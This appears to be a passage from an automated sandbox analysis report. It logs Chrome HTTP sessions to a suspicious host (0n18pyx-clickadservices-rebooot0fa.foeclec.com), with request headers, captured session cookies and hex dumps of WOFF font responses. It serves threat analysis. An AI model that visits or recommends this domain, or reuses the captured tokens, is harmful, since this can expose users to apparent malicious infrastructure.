                                                                                                                                      Data Ascii: 3|m?@`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:\Q>o(E^5Sdh<9t-kB6@PkrD#lpesx_'H
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: bf cd 85 bf 53 bf e2 c7 1c f6 cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd c5 61 5a 55 59 9a 0f cd a5 7c b3 55 ed 6b 08 d9 3e 2e e8 14 eb a1 c6 2d 23 31 06 d3 5c 07 73 91 a5 48 f6 10 c2 65 09 59 44 d5 32 9e c2 c0 67 88 49 29 63 f6 60 86 66 ae f7 aa d0 58 94 7c 06 f4 ab 58 8e d0 72 36 8b 19 fb d1 96 1d 44 50 d7 90 6d 47 b6 20 cc 83 76 4d b5 21 b9 79 ec 7d 89 41 6e
                                                                                                                                      Data Ascii: S{_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]aZUY|Uk>.-#1\sHeYD2gI)c`fX|Xr6DPmG vM!y}An
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: a8 65 12 04 2e 4d eb 35 d1 e1 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35 2d db bf 54 8e 2c e8 63 02 b6 b6 82 1f 1e 48 3c 04 3a 4d 54 d0 ba 1b 7f cf 00 55 2a 7c 3c 7a f7 c0 a9 d4 3c 3a e4 66 3e 91 cb 46 cd d4 3b 3d 5e 7c 75 77 09 fc 80 de 6b 83 b1 31 20 03 f7 52 5b 17 79 79 fc fa e3 c7 fe 67 66 0b 87 1e ce e4 67 4f 5f 86 a5 da ce f5 c1 0b 83 57 1e 81 d4 75 41 77
                                                                                                                                      Data Ascii: e.M5i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5-T,cH<:MTU*|<z<:f>F;=^|uwk1 R[yygfgO_WuAw
                                                                                                                                      2024-05-08 18:12:49 UTC1369INData Raw: dc 03 f9 3b 07 e6 8f 03 0a 13 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36 f3 fd ef 69 4c 75 77 3d d1 4d 84 97 19 e8 a7 6b fe ff f9 e1 fa fd 4c a2 2c c7 1e 8d a7 96 3f 2a d7 8f 3f 1f 03 bf fd da ba fb e8 7b 75 c5 a3 0a fe 9a ef 16 b0 ec ef b4 ce b9 94 ed 47 9b 64 db 4f 4d ac 65 d4 fc 88 ba 28 3c ff 22 39 a2 6a b1 ac 41 de 47 d1 17 e3 ce e4 66 86 cf a8 ea 07 b9 46
                                                                                                                                      Data Ascii: ;[|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6iLuw=MkL,?*?{uGdOMe(<"9jAGfF


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      36192.168.2.1649754104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:48 UTC1525OUTGET /12WoOwl2EBsyE56UvkVt2kJop49 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:48 UTC627INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:48 GMT
                                                                                                                                      Content-Type: font/woff
                                                                                                                                      Content-Length: 35970
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="12WoOwl2EBsyE56UvkVt2kJop49"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tUxVS7Ej%2FPGWkItciX6b2Iao0%2Ffu6MO6gY2HtgvhO1UQwXmuzT%2Bj9pIj25tP6pOdPHX4SlmnI6Hz%2B2ZG14jT9U3J42OvoQHn8DAntkp61fkyMPm%2BnACKjazqZQ3%2BwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b8a59b82813-SEA
                                                                                                                                      2024-05-08 18:12:48 UTC742INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                                                                                                                                      Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: a0 b7 e8 1d ca a7 02 da 41 45 b4 8b f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3 bc 50 85 78 b1 3a c5 cb d0 b6 02 6d 2b b1 af 56 d5 fc 8a aa e5 35 68 5b 8b 7e 45 b8 57 4c dd e8 72 70 c0 07 1e f8 30 ea 19 2a 50 75 18 f9 24 4f 41 af e9 94 86 d1 b7 f1 4c 4a e1 59 e4 e5 d9 e4 e1 39 18 65 ae da 02 4c b5 c0 14 02 a6 20 2f 22 3f b0 6d e1 a5 94 08 8c 8d bc 1c bf 2b f0 cc 4a ec ab c8 00 e6 a3 9c ab 1a
                                                                                                                                      Data Ascii: AEJjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjyPx:m+V5h[~EWLrp0*Pu$OALJY9eL /"?m+J
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 6e c2 97 42 2f 35 de 74 d3 5e f4 39 ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d 40 1e 50 59 8d a6 7b cc dc 9e fc 2d 41 9c 5d 4e 7e e1 ae 81 59 7d 09 c9 c5 66 eb 02 ac d5 ea 24 f2 9c 78 a1 06 76 01 ed 20 75 4a f3 4a 73 10 96 d3 c5 99 53 50 7e d2 e5 2c 1e 67 be 18 f1 f2 a0 3a 07 1a 6b d4 11 70 26 01 60 40 f6 04 e9 96 a1 d1 83 3c d3 03 30 a4 9e 21 58 2e b9 e8 f5 4a d5 14 1b 2a b7 a9 57 21 b7 4c
                                                                                                                                      Data Ascii: nB/5t^9zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A@PY{-A]N~Y}f$xv uJJsSP~,g:kp&`@<0!X.J*W!L
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 06 46 7b 14 75 5a 7d ac de 52 27 f5 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60 fe 86 9a a4 72 25 2f e8 02 2b db 4d 37 e8 55 27 f5 38 65 ab 0f 1d 9a da 48 4c 4b 16 fe e6 a4 da 6f 71 df a0 ae 62 b9 65 ed bf c4 41 e5 d1 d0 46 b6 ae f5 10 75 5c 1d 06 cf fc a6 15 68 2a ac 9c da bd 26 1f f6 56 49 be c2 33 cf f4 db d8 52 bd 9e a6 69 8f 20 71 d3 03 9d 50 07 1c 1f 60 98 39 7c c4 bc 3e 14 3d d2 60 a6
                                                                                                                                      Data Ascii: F{uZ}R'9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`r%/+M7U'8eHLKoqbeAFu\h*&VI3Ri qP`9|>=`
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 3d 8d ab 6f bb 08 29 71 c1 88 90 33 d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f c9 2f b5 48 99 53 57 d5 44 fb 7b 1c d4 1d 75 f0 0b a9 e2 ef b2 91 c5 37 80 af c9 ad ef 99 d5 fd 12 21 b2 25 f3 31 35 2c 45 de c5 d4 c9 93 a6 8e a5 09 bf 33 44 e7 bc f2 05 6a 36 20 00 d0 35 76 26 ee 24 8a a7 e9 2f f4 18 f0 41 b5 c0 14 14 2d 0d e8 15 76 e9 d5 5a d5 d6 45 58 cb 6c b1 fc 66 8b 95 ed 35 c3 fb b5 56 22
                                                                                                                                      Data Ascii: =o)q3X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek/HSWD{u7!%15,E3Dj6 5v&$/A-vZEXlf5V"
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: f1 60 1e 49 c9 7c 3b 8f a6 4b f8 4e be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6 8b 79 31 8d 44 a4 5b 42 b7 f0 52 5e 4a b7 f2 4b fc 12 8d 47 c4 5b 46 fd 79 39 2f a7 6b 79 05 af a0 eb 78 25 af a4 eb 11 07 57 d1 55 bc 9a 57 eb ff 3b c4 b9 74 35 ff 96 5f a6 cb 10 19 5f a1 3b 78 0d af a1 9b 74 84 a4 e1 3a 42 d2 5d 88 90 9b e8 76 44 c9 cd 74 b3 8e 93 94 a1 63 23 28 dc c1 3b 70 dc c9 3b 69 18 a2 64
                                                                                                                                      Data Ascii: `I|;KN<Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!xy1D[BR^JKG[Fy9/kyx%WUW;t5__;xt:B]vDtc#(;p;id
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a a0 85 4a d4 7e a5 aa 9f b2 b4 59 3d d8 a7 95 4a 52 9c 16 69 8c 66 11 4d 1b da
                                                                                                                                      Data Ascii: R.MM/X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}ZJ~Y=JRifM
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 54 be 1d b1 2c 41 1c 79 97 ab 31 c7 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11 97 21 86 c1 cd 80 5e 40 39 c1 b9 99 03 fa 04 a2 0a 8c c2 42 fc 7c 3d dc 90 01 1b 78 b5 7f 12 1f 1d 17 c7 58 32 fd b2 62 cc 19 5c a0 3a 2e ce 18 ed 0d 38 47 30 e6 8c 2c 6b a0 8a 63 b9 87 47 ce 75 b5 9f c5 e8 e8 9f 71 7a dd 97 c9 2f 3f da fe f8 e2 bc fc c1 63 6d f7 5f ce f9 a2 56 b8 ee df f1 32 f6 7e fe 04 f6 7d ad
                                                                                                                                      Data Ascii: T,Ay1`\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F!^@9B|=xX2b\:.8G0,kcGuqz/?cm_V2~}
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 50 87 c9 64 24 c2 03 28 ac 50 96 bb ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e 91 fd 45 74 5f 75 75 ef fb c2 fb b3 b6 bc e4 9f 37 70 64 81 6d 5a 47 51 64 73 49 7f cf c0 b9 4b 73 0f f4 e4 1c 7f b8 70 76 55 fd f4 fe ee be 33 17 9a 1e 1e 28 00 7c fd 81 76 bb a9 1d 15 6a 0b 22 04 a2 3a d8 9b e8 04 51 be d2 09 88 41 be 13 6d 85 df 15 66 70 2b 84 19 02 f7 e4 67 9f dd 6d 83 fa 0f 41 7f df 85 fa c1
                                                                                                                                      Data Ascii: Pd$(P<(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~Et_uu7pdmZGQdsIKspvU3(|vj":QAmfp+gmA
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 91 4d 4a 08 0f 03 db c2 c7 5d 85 d2 70 9a c3 c8 aa a2 8d 93 28 3e 95 5a 45 fe 3b 50 6b d7 92 2d d1 31 ee 01 1e f7 fd 6c 1b 51 87 4b ea eb 87 6c 21 42 79 43 c0 d4 a8 cc 34 85 6a 30 de 96 9e 0c 5c fd 20 68 c8 d6 71 1a f2 85 27 6e 36 04 64 45 65 36 a5 c8 54 24 fc da 02 f3 0d a4 20 f2 45 91 28 cb 66 06 9e 52 63 06 ac 77 62 1a 49 f2 56 e3 10 c0 f0 d3 12 cb 30 24 48 1b e9 17 a9 05 db d3 8d 58 e0 8e 3e b8 d6 68 31 63 c5 0f 27 83 fe d3 f1 be f8 92 25 63 de 38 ee 13 1e 72 f4 c8 99 c5 97 ec 3f 12 bd 72 61 f7 25 61 c3 ff 0f f0 03 ed c7 df 47 7d c1 40 82 9f 1b f0 21 08 78 ce 1d bc 51 90 65 2a de 5d 25 79 a5 6a 4c f5 55 60 80 de 5f e7 27 69 2b ad af a7 3a 1c 3c 18 bd c1 62 d6 9b f5 46 d1 45 25 28 ea 40 6b 5e 22 ae ea e0 20 71 56 e1 2f d3 6f 7f 90 df f9 e9 a7 9f 1e bd
                                                                                                                                      Data Ascii: MJ]p(>ZE;Pk-1lQKl!ByC4j0\ hq'n6dEe6T$ E(fRcwbIV0$HX>h1c'%c8r?ra%aG}@!xQe*]%yjLU`_'i+:<bFE%(@k^" qV/o


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      37192.168.2.1649758104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:48 UTC1524OUTGET /23FMnyUutKWXvsdabgp1irvw70 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:48 UTC618INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:48 GMT
                                                                                                                                      Content-Type: font/woff
                                                                                                                                      Content-Length: 36696
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="23FMnyUutKWXvsdabgp1irvw70"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZVrDsDe2KPXiOvLTYTudsz79mXyVu%2B4hcAzG5Bszx44m%2FnrJOYaWKs8AL2HfAGlNmhygRInmtTBmNyCb3YGbnCUeQTIekt7mh2o8mjreZDlRF6quEgNJDh2IaYI9dg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b8a5e11307d-SEA
                                                                                                                                      2024-05-08 18:12:48 UTC751INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                                                                                                      Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
